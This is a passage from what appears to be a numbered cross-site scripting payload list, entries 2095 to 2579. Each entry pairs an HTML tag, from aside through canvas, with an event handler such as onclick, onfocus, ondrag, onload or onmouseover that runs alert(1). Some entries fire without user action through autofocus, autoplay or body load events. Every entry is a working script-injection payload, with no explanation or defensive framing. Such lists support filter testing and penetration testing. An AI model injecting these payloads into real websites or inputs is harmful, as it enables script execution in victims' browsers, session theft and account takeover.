  2095. <aside onfocusout=alert(1) tabindex=1 id=x></aside><input autofocus>
  2096. <aside onkeydown="alert(1)" contenteditable>test</aside>
  2097. <aside onkeypress="alert(1)" contenteditable>test</aside>
  2098. <aside onkeyup="alert(1)" contenteditable>test</aside>
  2099. <aside onmousedown="alert(1)">test</aside>
  2100. <aside onmouseenter="alert(1)">test</aside>
  2101. <aside onmouseleave="alert(1)">test</aside>
  2102. <aside onmousemove="alert(1)">test</aside>
  2103. <aside onmouseout="alert(1)">test</aside>
  2104. <aside onmouseover="alert(1)">test</aside>
  2105. <aside onmouseup="alert(1)">test</aside>
  2106. <aside onpaste="alert(1)" contenteditable>test</aside>
  2107. <audio autoplay controls onpause=alert(1)><source src="validaudio.wav" type="audio/wav"></audio>
  2108. <audio autoplay controls onseeked=alert(1)><source src="validaudio.wav" type="audio/wav"></audio>
  2109. <audio autoplay controls onseeking=alert(1)><source src="validaudio.wav" type="audio/wav"></audio>
  2110. <audio autoplay controls onvolumechange=alert(1)><source src="validaudio.wav" type="audio/wav"></audio>
  2111. <audio autoplay onloadedmetadata=alert(1)> <source src="validaudio.wav" type="audio/wav"></audio>
  2112. <audio autoplay onplay=alert(1)><source src="validaudio.wav" type="audio/wav"></audio>
  2113. <audio autoplay onplaying=alert(1)><source src="validaudio.wav" type="audio/wav"></audio>
  2114. <audio controls autoplay onended=alert(1)><source src="validaudio.wav" type="audio/wav"></audio>
  2115. <audio controls autoplay ontimeupdate=alert(1)><source src="validaudio.wav" type="audio/wav"></audio>
  2116. <audio draggable="true" ondrag="alert(1)">test</audio>
  2117. <audio draggable="true" ondragend="alert(1)">test</audio>
  2118. <audio draggable="true" ondragenter="alert(1)">test</audio>
  2119. <audio draggable="true" ondragleave="alert(1)">test</audio>
  2120. <audio draggable="true" ondragstart="alert(1)">test</audio>
  2121. <audio id=x controls onfocus=alert(1) id=x><source src="validaudio.wav"></audio>
  2122. <audio id=x controls onfocusin=alert(1) id=x><source src="validaudio.wav"></audio>
  2123. <audio id=x tabindex=1 onactivate=alert(1)></audio>
  2124. <audio id=x tabindex=1 onbeforeactivate=alert(1)></audio>
  2125. <audio id=x tabindex=1 onbeforedeactivate=alert(1)></audio><input autofocus>
  2126. <audio id=x tabindex=1 ondeactivate=alert(1)></audio><input id=y autofocus>
  2127. <audio onbeforecopy="alert(1)" contenteditable>test</audio>
  2128. <audio onbeforecut="alert(1)" contenteditable>test</audio>
  2129. <audio onbeforepaste="alert(1)" contenteditable>test</audio>
  2130. <audio onblur=alert(1) tabindex=1 id=x></audio><input autofocus>
  2131. <audio oncanplay=alert(1)><source src="validaudio.wav" type="audio/wav"></audio>
  2132. <audio onclick="alert(1)">test</audio>
  2133. <audio oncontextmenu="alert(1)">test</audio>
  2134. <audio oncopy="alert(1)" contenteditable>test</audio>
  2135. <audio oncut="alert(1)" contenteditable>test</audio>
  2136. <audio ondblclick="alert(1)">test</audio>
  2137. <audio onfocusout=alert(1) tabindex=1 id=x></audio><input autofocus>
  2138. <audio onkeydown="alert(1)" contenteditable>test</audio>
  2139. <audio onkeypress="alert(1)" contenteditable>test</audio>
  2140. <audio onkeyup="alert(1)" contenteditable>test</audio>
  2141. <audio onloadeddata=alert(1)><source src="validaudio.wav" type="audio/wav"></audio>
  2142. <audio onmousedown="alert(1)">test</audio>
  2143. <audio onmouseenter="alert(1)">test</audio>
  2144. <audio onmouseleave="alert(1)">test</audio>
  2145. <audio onmousemove="alert(1)">test</audio>
  2146. <audio onmouseout="alert(1)">test</audio>
  2147. <audio onmouseover="alert(1)">test</audio>
  2148. <audio onmouseup="alert(1)">test</audio>
  2149. <audio onpaste="alert(1)" contenteditable>test</audio>
  2150. <audio src/onerror=alert(1)>
  2151. <b draggable="true" ondrag="alert(1)">test</b>
  2152. <b draggable="true" ondragend="alert(1)">test</b>
  2153. <b draggable="true" ondragenter="alert(1)">test</b>
  2154. <b draggable="true" ondragleave="alert(1)">test</b>
  2155. <b draggable="true" ondragstart="alert(1)">test</b>
  2156. <b id=x tabindex=1 onactivate=alert(1)></b>
  2157. <b id=x tabindex=1 onbeforeactivate=alert(1)></b>
  2158. <b id=x tabindex=1 onbeforedeactivate=alert(1)></b><input autofocus>
  2159. <b id=x tabindex=1 ondeactivate=alert(1)></b><input id=y autofocus>
  2160. <b id=x tabindex=1 onfocus=alert(1)></b>
  2161. <b id=x tabindex=1 onfocusin=alert(1)></b>
  2162. <b onbeforecopy="alert(1)" contenteditable>test</b>
  2163. <b onbeforecut="alert(1)" contenteditable>test</b>
  2164. <b onbeforepaste="alert(1)" contenteditable>test</b>
  2165. <b onblur=alert(1) tabindex=1 id=x></b><input autofocus>
  2166. <b onclick="alert(1)">test</b>
  2167. <b oncontextmenu="alert(1)">test</b>
  2168. <b oncopy="alert(1)" contenteditable>test</b>
  2169. <b oncut="alert(1)" contenteditable>test</b>
  2170. <b ondblclick="alert(1)">test</b>
  2171. <b onfocusout=alert(1) tabindex=1 id=x></b><input autofocus>
  2172. <b onkeydown="alert(1)" contenteditable>test</b>
  2173. <b onkeypress="alert(1)" contenteditable>test</b>
  2174. <b onkeyup="alert(1)" contenteditable>test</b>
  2175. <b onmousedown="alert(1)">test</b>
  2176. <b onmouseenter="alert(1)">test</b>
  2177. <b onmouseleave="alert(1)">test</b>
  2178. <b onmousemove="alert(1)">test</b>
  2179. <b onmouseout="alert(1)">test</b>
  2180. <b onmouseover="alert(1)">test</b>
  2181. <b onmouseup="alert(1)">test</b>
  2182. <b onpaste="alert(1)" contenteditable>test</b>
  2183. <base draggable="true" ondrag="alert(1)">test</base>
  2184. <base draggable="true" ondragend="alert(1)">test</base>
  2185. <base draggable="true" ondragenter="alert(1)">test</base>
  2186. <base draggable="true" ondragleave="alert(1)">test</base>
  2187. <base draggable="true" ondragstart="alert(1)">test</base>
  2188. <base id=x tabindex=1 onactivate=alert(1)></base>
  2189. <base id=x tabindex=1 onbeforeactivate=alert(1)></base>
  2190. <base id=x tabindex=1 onbeforedeactivate=alert(1)></base><input autofocus>
  2191. <base id=x tabindex=1 ondeactivate=alert(1)></base><input id=y autofocus>
  2192. <base id=x tabindex=1 onfocus=alert(1)></base>
  2193. <base id=x tabindex=1 onfocusin=alert(1)></base>
  2194. <base onbeforecopy="alert(1)" contenteditable>test</base>
  2195. <base onbeforecut="alert(1)" contenteditable>test</base>
  2196. <base onbeforepaste="alert(1)" contenteditable>test</base>
  2197. <base onblur=alert(1) tabindex=1 id=x></base><input autofocus>
  2198. <base onclick="alert(1)">test</base>
  2199. <base oncontextmenu="alert(1)">test</base>
  2200. <base oncopy="alert(1)" contenteditable>test</base>
  2201. <base oncut="alert(1)" contenteditable>test</base>
  2202. <base ondblclick="alert(1)">test</base>
  2203. <base onfocusout=alert(1) tabindex=1 id=x></base><input autofocus>
  2204. <base onkeydown="alert(1)" contenteditable>test</base>
  2205. <base onkeypress="alert(1)" contenteditable>test</base>
  2206. <base onkeyup="alert(1)" contenteditable>test</base>
  2207. <base onmousedown="alert(1)">test</base>
  2208. <base onmouseenter="alert(1)">test</base>
  2209. <base onmouseleave="alert(1)">test</base>
  2210. <base onmousemove="alert(1)">test</base>
  2211. <base onmouseout="alert(1)">test</base>
  2212. <base onmouseover="alert(1)">test</base>
  2213. <base onmouseup="alert(1)">test</base>
  2214. <base onpaste="alert(1)" contenteditable>test</base>
  2215. <basefont draggable="true" ondrag="alert(1)">test</basefont>
  2216. <basefont draggable="true" ondragend="alert(1)">test</basefont>
  2217. <basefont draggable="true" ondragenter="alert(1)">test</basefont>
  2218. <basefont draggable="true" ondragleave="alert(1)">test</basefont>
  2219. <basefont draggable="true" ondragstart="alert(1)">test</basefont>
  2220. <basefont id=x tabindex=1 onactivate=alert(1)></basefont>
  2221. <basefont id=x tabindex=1 onbeforeactivate=alert(1)></basefont>
  2222. <basefont id=x tabindex=1 onbeforedeactivate=alert(1)></basefont><input autofocus>
  2223. <basefont id=x tabindex=1 ondeactivate=alert(1)></basefont><input id=y autofocus>
  2224. <basefont id=x tabindex=1 onfocus=alert(1)></basefont>
  2225. <basefont id=x tabindex=1 onfocusin=alert(1)></basefont>
  2226. <basefont onbeforecopy="alert(1)" contenteditable>test</basefont>
  2227. <basefont onbeforecut="alert(1)" contenteditable>test</basefont>
  2228. <basefont onbeforepaste="alert(1)" contenteditable>test</basefont>
  2229. <basefont onblur=alert(1) tabindex=1 id=x></basefont><input autofocus>
  2230. <basefont onclick="alert(1)">test</basefont>
  2231. <basefont oncontextmenu="alert(1)">test</basefont>
  2232. <basefont oncopy="alert(1)" contenteditable>test</basefont>
  2233. <basefont oncut="alert(1)" contenteditable>test</basefont>
  2234. <basefont ondblclick="alert(1)">test</basefont>
  2235. <basefont onfocusout=alert(1) tabindex=1 id=x></basefont><input autofocus>
  2236. <basefont onkeydown="alert(1)" contenteditable>test</basefont>
  2237. <basefont onkeypress="alert(1)" contenteditable>test</basefont>
  2238. <basefont onkeyup="alert(1)" contenteditable>test</basefont>
  2239. <basefont onmousedown="alert(1)">test</basefont>
  2240. <basefont onmouseenter="alert(1)">test</basefont>
  2241. <basefont onmouseleave="alert(1)">test</basefont>
  2242. <basefont onmousemove="alert(1)">test</basefont>
  2243. <basefont onmouseout="alert(1)">test</basefont>
  2244. <basefont onmouseover="alert(1)">test</basefont>
  2245. <basefont onmouseup="alert(1)">test</basefont>
  2246. <basefont onpaste="alert(1)" contenteditable>test</basefont>
  2247. <bdi draggable="true" ondrag="alert(1)">test</bdi>
  2248. <bdi draggable="true" ondragend="alert(1)">test</bdi>
  2249. <bdi draggable="true" ondragenter="alert(1)">test</bdi>
  2250. <bdi draggable="true" ondragleave="alert(1)">test</bdi>
  2251. <bdi draggable="true" ondragstart="alert(1)">test</bdi>
  2252. <bdi id=x tabindex=1 onactivate=alert(1)></bdi>
  2253. <bdi id=x tabindex=1 onbeforeactivate=alert(1)></bdi>
  2254. <bdi id=x tabindex=1 onbeforedeactivate=alert(1)></bdi><input autofocus>
  2255. <bdi id=x tabindex=1 ondeactivate=alert(1)></bdi><input id=y autofocus>
  2256. <bdi id=x tabindex=1 onfocus=alert(1)></bdi>
  2257. <bdi id=x tabindex=1 onfocusin=alert(1)></bdi>
  2258. <bdi onbeforecopy="alert(1)" contenteditable>test</bdi>
  2259. <bdi onbeforecut="alert(1)" contenteditable>test</bdi>
  2260. <bdi onbeforepaste="alert(1)" contenteditable>test</bdi>
  2261. <bdi onblur=alert(1) tabindex=1 id=x></bdi><input autofocus>
  2262. <bdi onclick="alert(1)">test</bdi>
  2263. <bdi oncontextmenu="alert(1)">test</bdi>
  2264. <bdi oncopy="alert(1)" contenteditable>test</bdi>
  2265. <bdi oncut="alert(1)" contenteditable>test</bdi>
  2266. <bdi ondblclick="alert(1)">test</bdi>
  2267. <bdi onfocusout=alert(1) tabindex=1 id=x></bdi><input autofocus>
  2268. <bdi onkeydown="alert(1)" contenteditable>test</bdi>
  2269. <bdi onkeypress="alert(1)" contenteditable>test</bdi>
  2270. <bdi onkeyup="alert(1)" contenteditable>test</bdi>
  2271. <bdi onmousedown="alert(1)">test</bdi>
  2272. <bdi onmouseenter="alert(1)">test</bdi>
  2273. <bdi onmouseleave="alert(1)">test</bdi>
  2274. <bdi onmousemove="alert(1)">test</bdi>
  2275. <bdi onmouseout="alert(1)">test</bdi>
  2276. <bdi onmouseover="alert(1)">test</bdi>
  2277. <bdi onmouseup="alert(1)">test</bdi>
  2278. <bdi onpaste="alert(1)" contenteditable>test</bdi>
  2279. <bdo draggable="true" ondrag="alert(1)">test</bdo>
  2280. <bdo draggable="true" ondragend="alert(1)">test</bdo>
  2281. <bdo draggable="true" ondragenter="alert(1)">test</bdo>
  2282. <bdo draggable="true" ondragleave="alert(1)">test</bdo>
  2283. <bdo draggable="true" ondragstart="alert(1)">test</bdo>
  2284. <bdo id=x tabindex=1 onactivate=alert(1)></bdo>
  2285. <bdo id=x tabindex=1 onbeforeactivate=alert(1)></bdo>
  2286. <bdo id=x tabindex=1 onbeforedeactivate=alert(1)></bdo><input autofocus>
  2287. <bdo id=x tabindex=1 ondeactivate=alert(1)></bdo><input id=y autofocus>
  2288. <bdo id=x tabindex=1 onfocus=alert(1)></bdo>
  2289. <bdo id=x tabindex=1 onfocusin=alert(1)></bdo>
  2290. <bdo onbeforecopy="alert(1)" contenteditable>test</bdo>
  2291. <bdo onbeforecut="alert(1)" contenteditable>test</bdo>
  2292. <bdo onbeforepaste="alert(1)" contenteditable>test</bdo>
  2293. <bdo onblur=alert(1) tabindex=1 id=x></bdo><input autofocus>
  2294. <bdo onclick="alert(1)">test</bdo>
  2295. <bdo oncontextmenu="alert(1)">test</bdo>
  2296. <bdo oncopy="alert(1)" contenteditable>test</bdo>
  2297. <bdo oncut="alert(1)" contenteditable>test</bdo>
  2298. <bdo ondblclick="alert(1)">test</bdo>
  2299. <bdo onfocusout=alert(1) tabindex=1 id=x></bdo><input autofocus>
  2300. <bdo onkeydown="alert(1)" contenteditable>test</bdo>
  2301. <bdo onkeypress="alert(1)" contenteditable>test</bdo>
  2302. <bdo onkeyup="alert(1)" contenteditable>test</bdo>
  2303. <bdo onmousedown="alert(1)">test</bdo>
  2304. <bdo onmouseenter="alert(1)">test</bdo>
  2305. <bdo onmouseleave="alert(1)">test</bdo>
  2306. <bdo onmousemove="alert(1)">test</bdo>
  2307. <bdo onmouseout="alert(1)">test</bdo>
  2308. <bdo onmouseover="alert(1)">test</bdo>
  2309. <bdo onmouseup="alert(1)">test</bdo>
  2310. <bdo onpaste="alert(1)" contenteditable>test</bdo>
  2311. <bgsound draggable="true" ondrag="alert(1)">test</bgsound>
  2312. <bgsound draggable="true" ondragend="alert(1)">test</bgsound>
  2313. <bgsound draggable="true" ondragenter="alert(1)">test</bgsound>
  2314. <bgsound draggable="true" ondragleave="alert(1)">test</bgsound>
  2315. <bgsound draggable="true" ondragstart="alert(1)">test</bgsound>
  2316. <bgsound id=x tabindex=1 onactivate=alert(1)></bgsound>
  2317. <bgsound id=x tabindex=1 onbeforeactivate=alert(1)></bgsound>
  2318. <bgsound id=x tabindex=1 onbeforedeactivate=alert(1)></bgsound><input autofocus>
  2319. <bgsound id=x tabindex=1 ondeactivate=alert(1)></bgsound><input id=y autofocus>
  2320. <bgsound id=x tabindex=1 onfocus=alert(1)></bgsound>
  2321. <bgsound id=x tabindex=1 onfocusin=alert(1)></bgsound>
  2322. <bgsound onbeforecopy="alert(1)" contenteditable>test</bgsound>
  2323. <bgsound onbeforecut="alert(1)" contenteditable>test</bgsound>
  2324. <bgsound onbeforepaste="alert(1)" contenteditable>test</bgsound>
  2325. <bgsound onblur=alert(1) tabindex=1 id=x></bgsound><input autofocus>
  2326. <bgsound onclick="alert(1)">test</bgsound>
  2327. <bgsound oncontextmenu="alert(1)">test</bgsound>
  2328. <bgsound oncopy="alert(1)" contenteditable>test</bgsound>
  2329. <bgsound oncut="alert(1)" contenteditable>test</bgsound>
  2330. <bgsound ondblclick="alert(1)">test</bgsound>
  2331. <bgsound onfocusout=alert(1) tabindex=1 id=x></bgsound><input autofocus>
  2332. <bgsound onkeydown="alert(1)" contenteditable>test</bgsound>
  2333. <bgsound onkeypress="alert(1)" contenteditable>test</bgsound>
  2334. <bgsound onkeyup="alert(1)" contenteditable>test</bgsound>
  2335. <bgsound onmousedown="alert(1)">test</bgsound>
  2336. <bgsound onmouseenter="alert(1)">test</bgsound>
  2337. <bgsound onmouseleave="alert(1)">test</bgsound>
  2338. <bgsound onmousemove="alert(1)">test</bgsound>
  2339. <bgsound onmouseout="alert(1)">test</bgsound>
  2340. <bgsound onmouseover="alert(1)">test</bgsound>
  2341. <bgsound onmouseup="alert(1)">test</bgsound>
  2342. <bgsound onpaste="alert(1)" contenteditable>test</bgsound>
  2343. <big draggable="true" ondrag="alert(1)">test</big>
  2344. <big draggable="true" ondragend="alert(1)">test</big>
  2345. <big draggable="true" ondragenter="alert(1)">test</big>
  2346. <big draggable="true" ondragleave="alert(1)">test</big>
  2347. <big draggable="true" ondragstart="alert(1)">test</big>
  2348. <big id=x tabindex=1 onactivate=alert(1)></big>
  2349. <big id=x tabindex=1 onbeforeactivate=alert(1)></big>
  2350. <big id=x tabindex=1 onbeforedeactivate=alert(1)></big><input autofocus>
  2351. <big id=x tabindex=1 ondeactivate=alert(1)></big><input id=y autofocus>
  2352. <big id=x tabindex=1 onfocus=alert(1)></big>
  2353. <big id=x tabindex=1 onfocusin=alert(1)></big>
  2354. <big onbeforecopy="alert(1)" contenteditable>test</big>
  2355. <big onbeforecut="alert(1)" contenteditable>test</big>
  2356. <big onbeforepaste="alert(1)" contenteditable>test</big>
  2357. <big onblur=alert(1) tabindex=1 id=x></big><input autofocus>
  2358. <big onclick="alert(1)">test</big>
  2359. <big oncontextmenu="alert(1)">test</big>
  2360. <big oncopy="alert(1)" contenteditable>test</big>
  2361. <big oncut="alert(1)" contenteditable>test</big>
  2362. <big ondblclick="alert(1)">test</big>
  2363. <big onfocusout=alert(1) tabindex=1 id=x></big><input autofocus>
  2364. <big onkeydown="alert(1)" contenteditable>test</big>
  2365. <big onkeypress="alert(1)" contenteditable>test</big>
  2366. <big onkeyup="alert(1)" contenteditable>test</big>
  2367. <big onmousedown="alert(1)">test</big>
  2368. <big onmouseenter="alert(1)">test</big>
  2369. <big onmouseleave="alert(1)">test</big>
  2370. <big onmousemove="alert(1)">test</big>
  2371. <big onmouseout="alert(1)">test</big>
  2372. <big onmouseover="alert(1)">test</big>
  2373. <big onmouseup="alert(1)">test</big>
  2374. <big onpaste="alert(1)" contenteditable>test</big>
  2375. <blink draggable="true" ondrag="alert(1)">test</blink>
  2376. <blink draggable="true" ondragend="alert(1)">test</blink>
  2377. <blink draggable="true" ondragenter="alert(1)">test</blink>
  2378. <blink draggable="true" ondragleave="alert(1)">test</blink>
  2379. <blink draggable="true" ondragstart="alert(1)">test</blink>
  2380. <blink id=x tabindex=1 onactivate=alert(1)></blink>
  2381. <blink id=x tabindex=1 onbeforeactivate=alert(1)></blink>
  2382. <blink id=x tabindex=1 onbeforedeactivate=alert(1)></blink><input autofocus>
  2383. <blink id=x tabindex=1 ondeactivate=alert(1)></blink><input id=y autofocus>
  2384. <blink id=x tabindex=1 onfocus=alert(1)></blink>
  2385. <blink id=x tabindex=1 onfocusin=alert(1)></blink>
  2386. <blink onbeforecopy="alert(1)" contenteditable>test</blink>
  2387. <blink onbeforecut="alert(1)" contenteditable>test</blink>
  2388. <blink onbeforepaste="alert(1)" contenteditable>test</blink>
  2389. <blink onblur=alert(1) tabindex=1 id=x></blink><input autofocus>
  2390. <blink onclick="alert(1)">test</blink>
  2391. <blink oncontextmenu="alert(1)">test</blink>
  2392. <blink oncopy="alert(1)" contenteditable>test</blink>
  2393. <blink oncut="alert(1)" contenteditable>test</blink>
  2394. <blink ondblclick="alert(1)">test</blink>
  2395. <blink onfocusout=alert(1) tabindex=1 id=x></blink><input autofocus>
  2396. <blink onkeydown="alert(1)" contenteditable>test</blink>
  2397. <blink onkeypress="alert(1)" contenteditable>test</blink>
  2398. <blink onkeyup="alert(1)" contenteditable>test</blink>
  2399. <blink onmousedown="alert(1)">test</blink>
  2400. <blink onmouseenter="alert(1)">test</blink>
  2401. <blink onmouseleave="alert(1)">test</blink>
  2402. <blink onmousemove="alert(1)">test</blink>
  2403. <blink onmouseout="alert(1)">test</blink>
  2404. <blink onmouseover="alert(1)">test</blink>
  2405. <blink onmouseup="alert(1)">test</blink>
  2406. <blink onpaste="alert(1)" contenteditable>test</blink>
  2407. <blockquote draggable="true" ondrag="alert(1)">test</blockquote>
  2408. <blockquote draggable="true" ondragend="alert(1)">test</blockquote>
  2409. <blockquote draggable="true" ondragenter="alert(1)">test</blockquote>
  2410. <blockquote draggable="true" ondragleave="alert(1)">test</blockquote>
  2411. <blockquote draggable="true" ondragstart="alert(1)">test</blockquote>
  2412. <blockquote id=x tabindex=1 onactivate=alert(1)></blockquote>
  2413. <blockquote id=x tabindex=1 onbeforeactivate=alert(1)></blockquote>
  2414. <blockquote id=x tabindex=1 onbeforedeactivate=alert(1)></blockquote><input autofocus>
  2415. <blockquote id=x tabindex=1 ondeactivate=alert(1)></blockquote><input id=y autofocus>
  2416. <blockquote id=x tabindex=1 onfocus=alert(1)></blockquote>
  2417. <blockquote id=x tabindex=1 onfocusin=alert(1)></blockquote>
  2418. <blockquote onbeforecopy="alert(1)" contenteditable>test</blockquote>
  2419. <blockquote onbeforecut="alert(1)" contenteditable>test</blockquote>
  2420. <blockquote onbeforepaste="alert(1)" contenteditable>test</blockquote>
  2421. <blockquote onblur=alert(1) tabindex=1 id=x></blockquote><input autofocus>
  2422. <blockquote onclick="alert(1)">test</blockquote>
  2423. <blockquote oncontextmenu="alert(1)">test</blockquote>
  2424. <blockquote oncopy="alert(1)" contenteditable>test</blockquote>
  2425. <blockquote oncut="alert(1)" contenteditable>test</blockquote>
  2426. <blockquote ondblclick="alert(1)">test</blockquote>
  2427. <blockquote onfocusout=alert(1) tabindex=1 id=x></blockquote><input autofocus>
  2428. <blockquote onkeydown="alert(1)" contenteditable>test</blockquote>
  2429. <blockquote onkeypress="alert(1)" contenteditable>test</blockquote>
  2430. <blockquote onkeyup="alert(1)" contenteditable>test</blockquote>
  2431. <blockquote onmousedown="alert(1)">test</blockquote>
  2432. <blockquote onmouseenter="alert(1)">test</blockquote>
  2433. <blockquote onmouseleave="alert(1)">test</blockquote>
  2434. <blockquote onmousemove="alert(1)">test</blockquote>
  2435. <blockquote onmouseout="alert(1)">test</blockquote>
  2436. <blockquote onmouseover="alert(1)">test</blockquote>
  2437. <blockquote onmouseup="alert(1)">test</blockquote>
  2438. <blockquote onpaste="alert(1)" contenteditable>test</blockquote>
  2439. <body draggable="true" ondrag="alert(1)">test</body>
  2440. <body draggable="true" ondragend="alert(1)">test</body>
  2441. <body draggable="true" ondragenter="alert(1)">test</body>
  2442. <body draggable="true" ondragleave="alert(1)">test</body>
  2443. <body draggable="true" ondragstart="alert(1)">test</body>
  2444. <body id=x tabindex=1 onactivate=alert(1)></body>
  2445. <body id=x tabindex=1 onbeforeactivate=alert(1)></body>
  2446. <body id=x tabindex=1 onbeforedeactivate=alert(1)></body><input autofocus>
  2447. <body id=x tabindex=1 ondeactivate=alert(1)></body><input id=y autofocus>
  2448. <body id=x tabindex=1 onfocus=alert(1)></body>
  2449. <body id=x tabindex=1 onfocusin=alert(1)></body>
  2450. <body onafterprint=alert(1)>
  2451. <body onbeforecopy="alert(1)" contenteditable>test</body>
  2452. <body onbeforecut="alert(1)" contenteditable>test</body>
  2453. <body onbeforepaste="alert(1)" contenteditable>test</body>
  2454. <body onbeforeprint=alert(1)>
  2455. <body onbeforeunload="location='javascript:alert(1)'">
  2456. <body onblur=alert(1) id=x><iframe id=x>
  2457. <body onclick="alert(1)">test</body>
  2458. <body oncontextmenu="alert(1)">test</body>
  2459. <body oncopy="alert(1)" contenteditable>test</body>
  2460. <body oncut="alert(1)" contenteditable>test</body>
  2461. <body ondblclick="alert(1)">test</body>
  2462. <body onerror=alert(1) onload=/>
  2463. <body onfocusout=alert(1) id=x><iframe id=x>
  2464. <body onhashchange="alert(1)">
  2465. <body onkeydown="alert(1)" contenteditable>test</body>
  2466. <body onkeypress="alert(1)" contenteditable>test</body>
  2467. <body onkeyup="alert(1)" contenteditable>test</body>
  2468. <body onload=alert(1)>
  2469. <body onmessage=alert(1)>
  2470. <body onmousedown="alert(1)">test</body>
  2471. <body onmouseenter="alert(1)">test</body>
  2472. <body onmouseleave="alert(1)">test</body>
  2473. <body onmousemove="alert(1)">test</body>
  2474. <body onmouseout="alert(1)">test</body>
  2475. <body onmouseover="alert(1)">test</body>
  2476. <body onmouseup="alert(1)">test</body>
  2477. <body onpageshow=alert(1)>
  2478. <body onpaste="alert(1)" contenteditable>test</body>
  2479. <body onpopstate=alert(1)>
  2480. <body onresize="alert(1)">
  2481. <body onscroll=alert(1)><div style=height:1000px></div><div id=x></div>
  2482. <body onunhandledrejection=alert(1)><script>fetch('//xyz')</script>
  2483. <body onwheel=alert(1)>
  2484. <br draggable="true" ondrag="alert(1)">test</br>
  2485. <br draggable="true" ondragend="alert(1)">test</br>
  2486. <br draggable="true" ondragenter="alert(1)">test</br>
  2487. <br draggable="true" ondragleave="alert(1)">test</br>
  2488. <br draggable="true" ondragstart="alert(1)">test</br>
  2489. <br id=x tabindex=1 onactivate=alert(1)></br>
  2490. <br id=x tabindex=1 onbeforeactivate=alert(1)></br>
  2491. <br id=x tabindex=1 onbeforedeactivate=alert(1)></br><input autofocus>
  2492. <br id=x tabindex=1 ondeactivate=alert(1)></br><input id=y autofocus>
  2493. <br id=x tabindex=1 onfocus=alert(1)></br>
  2494. <br id=x tabindex=1 onfocusin=alert(1)></br>
  2495. <br onbeforecopy="alert(1)" contenteditable>test</br>
  2496. <br onbeforecut="alert(1)" contenteditable>test</br>
  2497. <br onbeforepaste="alert(1)" contenteditable>test</br>
  2498. <br onblur=alert(1) tabindex=1 id=x></br><input autofocus>
  2499. <br onclick="alert(1)">test</br>
  2500. <br oncontextmenu="alert(1)">test</br>
  2501. <br oncopy="alert(1)" contenteditable>test</br>
  2502. <br oncut="alert(1)" contenteditable>test</br>
  2503. <br ondblclick="alert(1)">test</br>
  2504. <br onfocusout=alert(1) tabindex=1 id=x></br><input autofocus>
  2505. <br onkeydown="alert(1)" contenteditable>test</br>
  2506. <br onkeypress="alert(1)" contenteditable>test</br>
  2507. <br onkeyup="alert(1)" contenteditable>test</br>
  2508. <br onmousedown="alert(1)">test</br>
  2509. <br onmouseenter="alert(1)">test</br>
  2510. <br onmouseleave="alert(1)">test</br>
  2511. <br onmousemove="alert(1)">test</br>
  2512. <br onmouseout="alert(1)">test</br>
  2513. <br onmouseover="alert(1)">test</br>
  2514. <br onmouseup="alert(1)">test</br>
  2515. <br onpaste="alert(1)" contenteditable>test</br>
  2516. <button autofocus onfocus=alert(1)>test</button>
  2517. <button autofocus onfocusin=alert(1)>test</button>
  2518. <button draggable="true" ondrag="alert(1)">test</button>
  2519. <button draggable="true" ondragend="alert(1)">test</button>
  2520. <button draggable="true" ondragenter="alert(1)">test</button>
  2521. <button draggable="true" ondragleave="alert(1)">test</button>
  2522. <button draggable="true" ondragstart="alert(1)">test</button>
  2523. <button id=x tabindex=1 onactivate=alert(1)></button>
  2524. <button id=x tabindex=1 onbeforeactivate=alert(1)></button>
  2525. <button id=x tabindex=1 onbeforedeactivate=alert(1)></button><input autofocus>
  2526. <button id=x tabindex=1 ondeactivate=alert(1)></button><input id=y autofocus>
  2527. <button onbeforecopy="alert(1)" contenteditable>test</button>
  2528. <button onbeforecut="alert(1)" contenteditable>test</button>
  2529. <button onbeforepaste="alert(1)" contenteditable>test</button>
  2530. <button onblur=alert(1) id=x></button><input autofocus>
  2531. <button onclick="alert(1)">test</button>
  2532. <button oncontextmenu="alert(1)">test</button>
  2533. <button oncopy="alert(1)" contenteditable>test</button>
  2534. <button oncut="alert(1)" contenteditable>test</button>
  2535. <button ondblclick="alert(1)">test</button>
  2536. <button onfocusout=alert(1) id=x></button><input autofocus>
  2537. <button onkeydown="alert(1)" contenteditable>test</button>
  2538. <button onkeypress="alert(1)" contenteditable>test</button>
  2539. <button onkeyup="alert(1)" contenteditable>test</button>
  2540. <button onmousedown="alert(1)">test</button>
  2541. <button onmouseenter="alert(1)">test</button>
  2542. <button onmouseleave="alert(1)">test</button>
  2543. <button onmousemove="alert(1)">test</button>
  2544. <button onmouseout="alert(1)">test</button>
  2545. <button onmouseover="alert(1)">test</button>
  2546. <button onmouseup="alert(1)">test</button>
  2547. <button onpaste="alert(1)" contenteditable>test</button>
  2548. <canvas draggable="true" ondrag="alert(1)">test</canvas>
  2549. <canvas draggable="true" ondragend="alert(1)">test</canvas>
  2550. <canvas draggable="true" ondragenter="alert(1)">test</canvas>
  2551. <canvas draggable="true" ondragleave="alert(1)">test</canvas>
  2552. <canvas draggable="true" ondragstart="alert(1)">test</canvas>
  2553. <canvas id=x tabindex=1 onactivate=alert(1)></canvas>
  2554. <canvas id=x tabindex=1 onbeforeactivate=alert(1)></canvas>
  2555. <canvas id=x tabindex=1 onbeforedeactivate=alert(1)></canvas><input autofocus>
  2556. <canvas id=x tabindex=1 ondeactivate=alert(1)></canvas><input id=y autofocus>
  2557. <canvas id=x tabindex=1 onfocus=alert(1)></canvas>
  2558. <canvas id=x tabindex=1 onfocusin=alert(1)></canvas>
  2559. <canvas onbeforecopy="alert(1)" contenteditable>test</canvas>
  2560. <canvas onbeforecut="alert(1)" contenteditable>test</canvas>
  2561. <canvas onbeforepaste="alert(1)" contenteditable>test</canvas>
  2562. <canvas onblur=alert(1) tabindex=1 id=x></canvas><input autofocus>
  2563. <canvas onclick="alert(1)">test</canvas>
  2564. <canvas oncontextmenu="alert(1)">test</canvas>
  2565. <canvas oncopy="alert(1)" contenteditable>test</canvas>
  2566. <canvas oncut="alert(1)" contenteditable>test</canvas>
  2567. <canvas ondblclick="alert(1)">test</canvas>
  2568. <canvas onfocusout=alert(1) tabindex=1 id=x></canvas><input autofocus>
  2569. <canvas onkeydown="alert(1)" contenteditable>test</canvas>
  2570. <canvas onkeypress="alert(1)" contenteditable>test</canvas>
  2571. <canvas onkeyup="alert(1)" contenteditable>test</canvas>
  2572. <canvas onmousedown="alert(1)">test</canvas>
  2573. <canvas onmouseenter="alert(1)">test</canvas>
  2574. <canvas onmouseleave="alert(1)">test</canvas>
  2575. <canvas onmousemove="alert(1)">test</canvas>
  2576. <canvas onmouseout="alert(1)">test</canvas>
  2577. <canvas onmouseover="alert(1)">test</canvas>
  2578. <canvas onmouseup="alert(1)">test</canvas>
  2579. <canvas onpaste="alert(1)" contenteditable>test</canvas>
